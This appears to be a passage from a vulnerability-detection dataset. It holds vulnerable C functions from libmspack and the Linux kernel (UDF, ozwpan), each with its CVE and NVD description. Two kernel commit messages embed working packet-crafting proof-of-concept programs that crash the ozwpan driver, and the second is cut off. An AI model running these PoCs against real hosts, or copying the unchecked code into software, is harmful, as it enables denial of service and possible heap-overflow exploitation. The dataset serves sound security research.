/* literal: 0 to LZX_NUM_CHARS-1 */
window[window_posn++] = main_element;
this_run--;
}
else {
/* match: LZX_NUM_CHARS + ((slot<<3) | length_header (3 bits)) */
main_element -= LZX_NUM_CHARS;
/* get match length */
match_length = main_element & LZX_NUM_PRIMARY_LENGTHS;
if (match_length == LZX_NUM_PRIMARY_LENGTHS) {
if (lzx->LENGTH_empty) {
D(("LENGTH symbol needed but tree is empty"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
READ_HUFFSYM(LENGTH, length_footer);
match_length += length_footer;
}
match_length += LZX_MIN_MATCH;
/* get match offset */
switch ((match_offset = (main_element >> 3))) {
case 0: match_offset = R0; break;
case 1: match_offset = R1; R1=R0; R0 = match_offset; break;
case 2: match_offset = R2; R2=R0; R0 = match_offset; break;
case 3: match_offset = 1; R2=R1; R1=R0; R0 = match_offset; break;
default:
extra = (match_offset >= 36) ? 17 : extra_bits[match_offset];
READ_BITS(verbatim_bits, extra);
match_offset = position_base[match_offset] - 2 + verbatim_bits;
R2 = R1; R1 = R0; R0 = match_offset;
}
/* LZX DELTA uses max match length to signal even longer match */
if (match_length == LZX_MAX_MATCH && lzx->is_delta) {
int extra_len = 0;
ENSURE_BITS(3); /* 4 entry huffman tree */
if (PEEK_BITS(1) == 0) {
REMOVE_BITS(1); /* '0' -> 8 extra length bits */
READ_BITS(extra_len, 8);
}
else if (PEEK_BITS(2) == 2) {
REMOVE_BITS(2); /* '10' -> 10 extra length bits + 0x100 */
READ_BITS(extra_len, 10);
extra_len += 0x100;
}
else if (PEEK_BITS(3) == 6) {
REMOVE_BITS(3); /* '110' -> 12 extra length bits + 0x500 */
READ_BITS(extra_len, 12);
extra_len += 0x500;
}
else {
REMOVE_BITS(3); /* '111' -> 15 extra length bits */
READ_BITS(extra_len, 15);
}
match_length += extra_len;
}
if ((window_posn + match_length) > lzx->window_size) {
D(("match ran over window wrap"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* copy match */
rundest = &window[window_posn];
i = match_length;
/* does match offset wrap the window? */
if (match_offset > window_posn) {
if (match_offset > lzx->offset &&
(match_offset - window_posn) > lzx->ref_data_size)
{
D(("match offset beyond LZX stream"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* j = length from match offset to end of window */
j = match_offset - window_posn;
if (j > (int) lzx->window_size) {
D(("match offset beyond window boundaries"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
runsrc = &window[lzx->window_size - j];
if (j < i) {
/* if match goes over the window edge, do two copy runs */
i -= j; while (j-- > 0) *rundest++ = *runsrc++;
runsrc = window;
}
while (i-- > 0) *rundest++ = *runsrc++;
}
else {
runsrc = rundest - match_offset;
while (i-- > 0) *rundest++ = *runsrc++;
}
this_run -= match_length;
window_posn += match_length;
}
} /* while (this_run > 0) */
break;
case LZX_BLOCKTYPE_ALIGNED:
while (this_run > 0) {
READ_HUFFSYM(MAINTREE, main_element);
if (main_element < LZX_NUM_CHARS) {
/* literal: 0 to LZX_NUM_CHARS-1 */
window[window_posn++] = main_element;
this_run--;
}
else {
/* match: LZX_NUM_CHARS + ((slot<<3) | length_header (3 bits)) */
main_element -= LZX_NUM_CHARS;
/* get match length */
match_length = main_element & LZX_NUM_PRIMARY_LENGTHS;
if (match_length == LZX_NUM_PRIMARY_LENGTHS) {
if (lzx->LENGTH_empty) {
D(("LENGTH symbol needed but tree is empty"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
READ_HUFFSYM(LENGTH, length_footer);
match_length += length_footer;
}
match_length += LZX_MIN_MATCH;
/* get match offset */
switch ((match_offset = (main_element >> 3))) {
case 0: match_offset = R0; break;
case 1: match_offset = R1; R1 = R0; R0 = match_offset; break;
case 2: match_offset = R2; R2 = R0; R0 = match_offset; break;
default:
extra = (match_offset >= 36) ? 17 : extra_bits[match_offset];
match_offset = position_base[match_offset] - 2;
if (extra > 3) {
/* verbatim and aligned bits */
extra -= 3;
READ_BITS(verbatim_bits, extra);
match_offset += (verbatim_bits << 3);
READ_HUFFSYM(ALIGNED, aligned_bits);
match_offset += aligned_bits;
}
else if (extra == 3) {
/* aligned bits only */
READ_HUFFSYM(ALIGNED, aligned_bits);
match_offset += aligned_bits;
}
else if (extra > 0) { /* extra==1, extra==2 */
/* verbatim bits only */
READ_BITS(verbatim_bits, extra);
match_offset += verbatim_bits;
}
else /* extra == 0 */ {
/* ??? not defined in LZX specification! */
match_offset = 1;
}
/* update repeated offset LRU queue */
R2 = R1; R1 = R0; R0 = match_offset;
}
/* LZX DELTA uses max match length to signal even longer match */
if (match_length == LZX_MAX_MATCH && lzx->is_delta) {
int extra_len = 0;
ENSURE_BITS(3); /* 4 entry huffman tree */
if (PEEK_BITS(1) == 0) {
REMOVE_BITS(1); /* '0' -> 8 extra length bits */
READ_BITS(extra_len, 8);
}
else if (PEEK_BITS(2) == 2) {
REMOVE_BITS(2); /* '10' -> 10 extra length bits + 0x100 */
READ_BITS(extra_len, 10);
extra_len += 0x100;
}
else if (PEEK_BITS(3) == 6) {
REMOVE_BITS(3); /* '110' -> 12 extra length bits + 0x500 */
READ_BITS(extra_len, 12);
extra_len += 0x500;
}
else {
REMOVE_BITS(3); /* '111' -> 15 extra length bits */
READ_BITS(extra_len, 15);
}
match_length += extra_len;
}
if ((window_posn + match_length) > lzx->window_size) {
D(("match ran over window wrap"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* copy match */
rundest = &window[window_posn];
i = match_length;
/* does match offset wrap the window? */
if (match_offset > window_posn) {
if (match_offset > lzx->offset &&
(match_offset - window_posn) > lzx->ref_data_size)
{
D(("match offset beyond LZX stream"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* j = length from match offset to end of window */
j = match_offset - window_posn;
if (j > (int) lzx->window_size) {
D(("match offset beyond window boundaries"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
runsrc = &window[lzx->window_size - j];
if (j < i) {
/* if match goes over the window edge, do two copy runs */
i -= j; while (j-- > 0) *rundest++ = *runsrc++;
runsrc = window;
}
while (i-- > 0) *rundest++ = *runsrc++;
}
else {
runsrc = rundest - match_offset;
while (i-- > 0) *rundest++ = *runsrc++;
}
this_run -= match_length;
window_posn += match_length;
}
} /* while (this_run > 0) */
break;
case LZX_BLOCKTYPE_UNCOMPRESSED:
/* as this_run is limited not to wrap a frame, this also means it
* won't wrap the window (as the window is a multiple of 32k) */
rundest = &window[window_posn];
window_posn += this_run;
while (this_run > 0) {
if ((i = i_end - i_ptr) == 0) {
READ_IF_NEEDED;
}
else {
if (i > this_run) i = this_run;
lzx->sys->copy(i_ptr, rundest, (size_t) i);
rundest += i;
i_ptr += i;
this_run -= i;
}
}
break;
default:
return lzx->error = MSPACK_ERR_DECRUNCH; /* might as well */
}
/* did the final match overrun our desired this_run length? */
if (this_run < 0) {
if ((unsigned int)(-this_run) > lzx->block_remaining) {
D(("overrun went past end of block by %d (%d remaining)",
-this_run, lzx->block_remaining ))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
lzx->block_remaining -= -this_run;
}
} /* while (bytes_todo > 0) */
/* streams don't extend over frame boundaries */
if ((window_posn - lzx->frame_posn) != frame_size) {
D(("decode beyond output frame limits! %d != %d",
window_posn - lzx->frame_posn, frame_size))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* re-align input bitstream */
if (bits_left > 0) ENSURE_BITS(16);
if (bits_left & 15) REMOVE_BITS(bits_left & 15);
/* check that we've used all of the previous frame first */
if (lzx->o_ptr != lzx->o_end) {
D(("%ld avail bytes, new %d frame",
(long)(lzx->o_end - lzx->o_ptr), frame_size))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* does this intel block _really_ need decoding? */
if (lzx->intel_started && lzx->intel_filesize &&
(lzx->frame <= 32768) && (frame_size > 10))
{
unsigned char *data = &lzx->e8_buf[0];
unsigned char *dataend = &lzx->e8_buf[frame_size - 10];
signed int curpos = lzx->intel_curpos;
signed int filesize = lzx->intel_filesize;
signed int abs_off, rel_off;
/* copy e8 block to the e8 buffer and tweak if needed */
lzx->o_ptr = data;
lzx->sys->copy(&lzx->window[lzx->frame_posn], data, frame_size);
while (data < dataend) {
if (*data++ != 0xE8) { curpos++; continue; }
abs_off = data[0] | (data[1]<<8) | (data[2]<<16) | (data[3]<<24);
if ((abs_off >= -curpos) && (abs_off < filesize)) {
rel_off = (abs_off >= 0) ? abs_off - curpos : abs_off + filesize;
data[0] = (unsigned char) rel_off;
data[1] = (unsigned char) (rel_off >> 8);
data[2] = (unsigned char) (rel_off >> 16);
data[3] = (unsigned char) (rel_off >> 24);
}
data += 4;
curpos += 5;
}
lzx->intel_curpos += frame_size;
}
else {
lzx->o_ptr = &lzx->window[lzx->frame_posn];
if (lzx->intel_filesize) lzx->intel_curpos += frame_size;
}
lzx->o_end = &lzx->o_ptr[frame_size];
/* write a frame */
i = (out_bytes < (off_t)frame_size) ? (unsigned int)out_bytes : frame_size;
if (lzx->sys->write(lzx->output, lzx->o_ptr, i) != i) {
return lzx->error = MSPACK_ERR_WRITE;
}
lzx->o_ptr += i;
lzx->offset += i;
out_bytes -= i;
/* advance frame start position */
lzx->frame_posn += frame_size;
lzx->frame++;
/* wrap window / frame position pointers */
if (window_posn == lzx->window_size) window_posn = 0;
if (lzx->frame_posn == lzx->window_size) lzx->frame_posn = 0;
} /* while (lzx->frame < end_frame) */
if (out_bytes) {
D(("bytes left to output"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* store local state */
STORE_BITS;
lzx->window_posn = window_posn;
lzx->R0 = R0;
lzx->R1 = R1;
lzx->R2 = R2;
return MSPACK_ERR_OK;
}
| 301,703,386,296,293,370,000,000,000,000,000,000,000 | lzxd.c | 337,003,730,914,340,000,000,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2015-4471 | Off-by-one error in the lzxd_decompress function in lzxd.c in libmspack before 0.5 allows remote attackers to cause a denial of service (buffer under-read and application crash) via a crafted CAB archive. | https://nvd.nist.gov/vuln/detail/CVE-2015-4471 |
1,470 | linux | 23b133bdc452aa441fcb9b82cbf6dd05cfd342d0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/23b133bdc452aa441fcb9b82cbf6dd05cfd342d0 | udf: Check length of extended attributes and allocation descriptors
Check length of extended attributes and allocation descriptors when
loading inodes from disk. Otherwise corrupted filesystems could confuse
the code and make the kernel oops.
Reported-by: Carl Henrik Lunde <chlunde@ping.uio.no>
CC: stable@vger.kernel.org
Signed-off-by: Jan Kara <jack@suse.cz> | 1 | static int udf_read_inode(struct inode *inode, bool hidden_inode)
{
struct buffer_head *bh = NULL;
struct fileEntry *fe;
struct extendedFileEntry *efe;
uint16_t ident;
struct udf_inode_info *iinfo = UDF_I(inode);
struct udf_sb_info *sbi = UDF_SB(inode->i_sb);
struct kernel_lb_addr *iloc = &iinfo->i_location;
unsigned int link_count;
unsigned int indirections = 0;
int bs = inode->i_sb->s_blocksize;
int ret = -EIO;
reread:
if (iloc->logicalBlockNum >=
sbi->s_partmaps[iloc->partitionReferenceNum].s_partition_len) {
udf_debug("block=%d, partition=%d out of range\n",
iloc->logicalBlockNum, iloc->partitionReferenceNum);
return -EIO;
}
/*
* Set defaults, but the inode is still incomplete!
* Note: get_new_inode() sets the following on a new inode:
* i_sb = sb
* i_no = ino
* i_flags = sb->s_flags
* i_state = 0
* clean_inode(): zero fills and sets
* i_count = 1
* i_nlink = 1
* i_op = NULL;
*/
bh = udf_read_ptagged(inode->i_sb, iloc, 0, &ident);
if (!bh) {
udf_err(inode->i_sb, "(ino %ld) failed !bh\n", inode->i_ino);
return -EIO;
}
if (ident != TAG_IDENT_FE && ident != TAG_IDENT_EFE &&
ident != TAG_IDENT_USE) {
udf_err(inode->i_sb, "(ino %ld) failed ident=%d\n",
inode->i_ino, ident);
goto out;
}
fe = (struct fileEntry *)bh->b_data;
efe = (struct extendedFileEntry *)bh->b_data;
if (fe->icbTag.strategyType == cpu_to_le16(4096)) {
struct buffer_head *ibh;
ibh = udf_read_ptagged(inode->i_sb, iloc, 1, &ident);
if (ident == TAG_IDENT_IE && ibh) {
struct kernel_lb_addr loc;
struct indirectEntry *ie;
ie = (struct indirectEntry *)ibh->b_data;
loc = lelb_to_cpu(ie->indirectICB.extLocation);
if (ie->indirectICB.extLength) {
brelse(ibh);
memcpy(&iinfo->i_location, &loc,
sizeof(struct kernel_lb_addr));
if (++indirections > UDF_MAX_ICB_NESTING) {
udf_err(inode->i_sb,
"too many ICBs in ICB hierarchy"
" (max %d supported)\n",
UDF_MAX_ICB_NESTING);
goto out;
}
brelse(bh);
goto reread;
}
}
brelse(ibh);
} else if (fe->icbTag.strategyType != cpu_to_le16(4)) {
udf_err(inode->i_sb, "unsupported strategy type: %d\n",
le16_to_cpu(fe->icbTag.strategyType));
goto out;
}
if (fe->icbTag.strategyType == cpu_to_le16(4))
iinfo->i_strat4096 = 0;
else /* if (fe->icbTag.strategyType == cpu_to_le16(4096)) */
iinfo->i_strat4096 = 1;
iinfo->i_alloc_type = le16_to_cpu(fe->icbTag.flags) &
ICBTAG_FLAG_AD_MASK;
iinfo->i_unique = 0;
iinfo->i_lenEAttr = 0;
iinfo->i_lenExtents = 0;
iinfo->i_lenAlloc = 0;
iinfo->i_next_alloc_block = 0;
iinfo->i_next_alloc_goal = 0;
if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_EFE)) {
iinfo->i_efe = 1;
iinfo->i_use = 0;
ret = udf_alloc_i_data(inode, bs -
sizeof(struct extendedFileEntry));
if (ret)
goto out;
memcpy(iinfo->i_ext.i_data,
bh->b_data + sizeof(struct extendedFileEntry),
bs - sizeof(struct extendedFileEntry));
} else if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_FE)) {
iinfo->i_efe = 0;
iinfo->i_use = 0;
ret = udf_alloc_i_data(inode, bs - sizeof(struct fileEntry));
if (ret)
goto out;
memcpy(iinfo->i_ext.i_data,
bh->b_data + sizeof(struct fileEntry),
bs - sizeof(struct fileEntry));
} else if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_USE)) {
iinfo->i_efe = 0;
iinfo->i_use = 1;
iinfo->i_lenAlloc = le32_to_cpu(
((struct unallocSpaceEntry *)bh->b_data)->
lengthAllocDescs);
ret = udf_alloc_i_data(inode, bs -
sizeof(struct unallocSpaceEntry));
if (ret)
goto out;
memcpy(iinfo->i_ext.i_data,
bh->b_data + sizeof(struct unallocSpaceEntry),
bs - sizeof(struct unallocSpaceEntry));
return 0;
}
ret = -EIO;
read_lock(&sbi->s_cred_lock);
i_uid_write(inode, le32_to_cpu(fe->uid));
if (!uid_valid(inode->i_uid) ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_UID_IGNORE) ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_UID_SET))
inode->i_uid = UDF_SB(inode->i_sb)->s_uid;
i_gid_write(inode, le32_to_cpu(fe->gid));
if (!gid_valid(inode->i_gid) ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_GID_IGNORE) ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_GID_SET))
inode->i_gid = UDF_SB(inode->i_sb)->s_gid;
if (fe->icbTag.fileType != ICBTAG_FILE_TYPE_DIRECTORY &&
sbi->s_fmode != UDF_INVALID_MODE)
inode->i_mode = sbi->s_fmode;
else if (fe->icbTag.fileType == ICBTAG_FILE_TYPE_DIRECTORY &&
sbi->s_dmode != UDF_INVALID_MODE)
inode->i_mode = sbi->s_dmode;
else
inode->i_mode = udf_convert_permissions(fe);
inode->i_mode &= ~sbi->s_umask;
read_unlock(&sbi->s_cred_lock);
link_count = le16_to_cpu(fe->fileLinkCount);
if (!link_count) {
if (!hidden_inode) {
ret = -ESTALE;
goto out;
}
link_count = 1;
}
set_nlink(inode, link_count);
inode->i_size = le64_to_cpu(fe->informationLength);
iinfo->i_lenExtents = inode->i_size;
if (iinfo->i_efe == 0) {
inode->i_blocks = le64_to_cpu(fe->logicalBlocksRecorded) <<
(inode->i_sb->s_blocksize_bits - 9);
if (!udf_disk_stamp_to_time(&inode->i_atime, fe->accessTime))
inode->i_atime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&inode->i_mtime,
fe->modificationTime))
inode->i_mtime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&inode->i_ctime, fe->attrTime))
inode->i_ctime = sbi->s_record_time;
iinfo->i_unique = le64_to_cpu(fe->uniqueID);
iinfo->i_lenEAttr = le32_to_cpu(fe->lengthExtendedAttr);
iinfo->i_lenAlloc = le32_to_cpu(fe->lengthAllocDescs);
iinfo->i_checkpoint = le32_to_cpu(fe->checkpoint);
} else {
inode->i_blocks = le64_to_cpu(efe->logicalBlocksRecorded) <<
(inode->i_sb->s_blocksize_bits - 9);
if (!udf_disk_stamp_to_time(&inode->i_atime, efe->accessTime))
inode->i_atime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&inode->i_mtime,
efe->modificationTime))
inode->i_mtime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&iinfo->i_crtime, efe->createTime))
iinfo->i_crtime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&inode->i_ctime, efe->attrTime))
inode->i_ctime = sbi->s_record_time;
iinfo->i_unique = le64_to_cpu(efe->uniqueID);
iinfo->i_lenEAttr = le32_to_cpu(efe->lengthExtendedAttr);
iinfo->i_lenAlloc = le32_to_cpu(efe->lengthAllocDescs);
iinfo->i_checkpoint = le32_to_cpu(efe->checkpoint);
}
inode->i_generation = iinfo->i_unique;
/* Sanity checks for files in ICB so that we don't get confused later */
if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
/*
* For file in ICB data is stored in allocation descriptor
* so sizes should match
*/
if (iinfo->i_lenAlloc != inode->i_size)
goto out;
/* File in ICB has to fit in there... */
if (inode->i_size > bs - udf_file_entry_alloc_offset(inode))
goto out;
}
switch (fe->icbTag.fileType) {
case ICBTAG_FILE_TYPE_DIRECTORY:
inode->i_op = &udf_dir_inode_operations;
inode->i_fop = &udf_dir_operations;
inode->i_mode |= S_IFDIR;
inc_nlink(inode);
break;
case ICBTAG_FILE_TYPE_REALTIME:
case ICBTAG_FILE_TYPE_REGULAR:
case ICBTAG_FILE_TYPE_UNDEF:
case ICBTAG_FILE_TYPE_VAT20:
if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
inode->i_data.a_ops = &udf_adinicb_aops;
else
inode->i_data.a_ops = &udf_aops;
inode->i_op = &udf_file_inode_operations;
inode->i_fop = &udf_file_operations;
inode->i_mode |= S_IFREG;
break;
case ICBTAG_FILE_TYPE_BLOCK:
inode->i_mode |= S_IFBLK;
break;
case ICBTAG_FILE_TYPE_CHAR:
inode->i_mode |= S_IFCHR;
break;
case ICBTAG_FILE_TYPE_FIFO:
init_special_inode(inode, inode->i_mode | S_IFIFO, 0);
break;
case ICBTAG_FILE_TYPE_SOCKET:
init_special_inode(inode, inode->i_mode | S_IFSOCK, 0);
break;
case ICBTAG_FILE_TYPE_SYMLINK:
inode->i_data.a_ops = &udf_symlink_aops;
inode->i_op = &udf_symlink_inode_operations;
inode->i_mode = S_IFLNK | S_IRWXUGO;
break;
case ICBTAG_FILE_TYPE_MAIN:
udf_debug("METADATA FILE-----\n");
break;
case ICBTAG_FILE_TYPE_MIRROR:
udf_debug("METADATA MIRROR FILE-----\n");
break;
case ICBTAG_FILE_TYPE_BITMAP:
udf_debug("METADATA BITMAP FILE-----\n");
break;
default:
udf_err(inode->i_sb, "(ino %ld) failed unknown file type=%d\n",
inode->i_ino, fe->icbTag.fileType);
goto out;
}
if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode)) {
struct deviceSpec *dsea =
(struct deviceSpec *)udf_get_extendedattr(inode, 12, 1);
if (dsea) {
init_special_inode(inode, inode->i_mode,
MKDEV(le32_to_cpu(dsea->majorDeviceIdent),
le32_to_cpu(dsea->minorDeviceIdent)));
/* Developer ID ??? */
} else
goto out;
}
ret = 0;
out:
brelse(bh);
return ret;
}
| 154,377,499,296,836,300,000,000,000,000,000,000,000 | None | null | [
"CWE-189"
] | CVE-2015-4167 | The udf_read_inode function in fs/udf/inode.c in the Linux kernel before 3.19.1 does not validate certain length values, which allows local users to cause a denial of service (incorrect data representation or integer overflow, and OOPS) via a crafted UDF filesystem. | https://nvd.nist.gov/vuln/detail/CVE-2015-4167 |
1,472 | linux | 04bf464a5dfd9ade0dda918e44366c2c61fce80b | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/04bf464a5dfd9ade0dda918e44366c2c61fce80b | ozwpan: divide-by-zero leading to panic
A network supplied parameter was not checked before division, leading to
a divide-by-zero. Since this happens in the softirq path, it leads to a
crash. A PoC follows below, which requires the ozprotocol.h file from
this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
struct oz_elt oz_elt2;
struct oz_multiple_fixed oz_multiple_fixed;
} __packed packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 0,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
},
.oz_elt2 = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_multiple_fixed)
},
.oz_multiple_fixed = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_USB_ENDPOINT_DATA,
.endpoint = 0,
.format = OZ_DATA_F_MULTIPLE_FIXED,
.unit_size = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | static void oz_usb_handle_ep_data(struct oz_usb_ctx *usb_ctx,
struct oz_usb_hdr *usb_hdr, int len)
{
struct oz_data *data_hdr = (struct oz_data *)usb_hdr;
switch (data_hdr->format) {
case OZ_DATA_F_MULTIPLE_FIXED: {
struct oz_multiple_fixed *body =
(struct oz_multiple_fixed *)data_hdr;
u8 *data = body->data;
int n = (len - sizeof(struct oz_multiple_fixed)+1)
/ body->unit_size;
while (n--) {
oz_hcd_data_ind(usb_ctx->hport, body->endpoint,
data, body->unit_size);
data += body->unit_size;
}
}
break;
case OZ_DATA_F_ISOC_FIXED: {
struct oz_isoc_fixed *body =
(struct oz_isoc_fixed *)data_hdr;
int data_len = len-sizeof(struct oz_isoc_fixed)+1;
int unit_size = body->unit_size;
u8 *data = body->data;
int count;
int i;
if (!unit_size)
break;
count = data_len/unit_size;
for (i = 0; i < count; i++) {
oz_hcd_data_ind(usb_ctx->hport,
body->endpoint, data, unit_size);
data += unit_size;
}
}
break;
}
}
| 108,503,765,742,072,030,000,000,000,000,000,000,000 | ozusbsvc1.c | 4,167,953,671,616,514,400,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2015-4003 | The oz_usb_handle_ep_data function in drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver in the Linux kernel through 4.0.5 allows remote attackers to cause a denial of service (divide-by-zero error and system crash) via a crafted packet. | https://nvd.nist.gov/vuln/detail/CVE-2015-4003 |
1,473 | linux | d114b9fe78c8d6fc6e70808c2092aa307c36dc8e | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/d114b9fe78c8d6fc6e70808c2092aa307c36dc8e | ozwpan: Use proper check to prevent heap overflow
Since elt->length is a u8, we can make this variable a u8. Then we can
do proper bounds checking more easily. Without this, a potentially
negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
resulting in a remotely exploitable heap overflow with network
supplied data.
This could result in remote code execution. A PoC which obtains DoS
follows below. It requires the ozprotocol.h file from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
